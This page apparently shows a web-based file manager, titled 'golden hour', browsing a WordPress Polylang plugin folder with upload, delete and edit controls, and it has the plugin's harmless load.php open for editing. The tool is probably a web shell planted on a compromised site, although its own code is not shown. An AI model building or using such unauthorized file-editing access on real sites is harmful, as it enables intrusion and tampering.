golden hour
/home/godaofbq/zenearth.com/wp-content/plugins/polylang/modules/wpml
⬆️ Go Up
Upload
File/Folder
Size
Actions
load.php
348 B
Del
OK
wpml-api.php
16.84 KB
Del
OK
wpml-compat.php
5.44 KB
Del
OK
wpml-config.php
27.41 KB
Del
OK
wpml-legacy-api.php
15.37 KB
Del
OK
Edit: load.php
<?php /** * Loads the WPML compatibility mode. * * @package Polylang */ if ( ! defined( 'ABSPATH' ) ) { exit; // Don't access directly. } if ( $polylang->model->has_languages() ) { if ( ! defined( 'PLL_WPML_COMPAT' ) || PLL_WPML_COMPAT ) { PLL_WPML_Compat::instance(); // WPML API. PLL_WPML_Config::instance(); // wpml-config.xml. } }
Save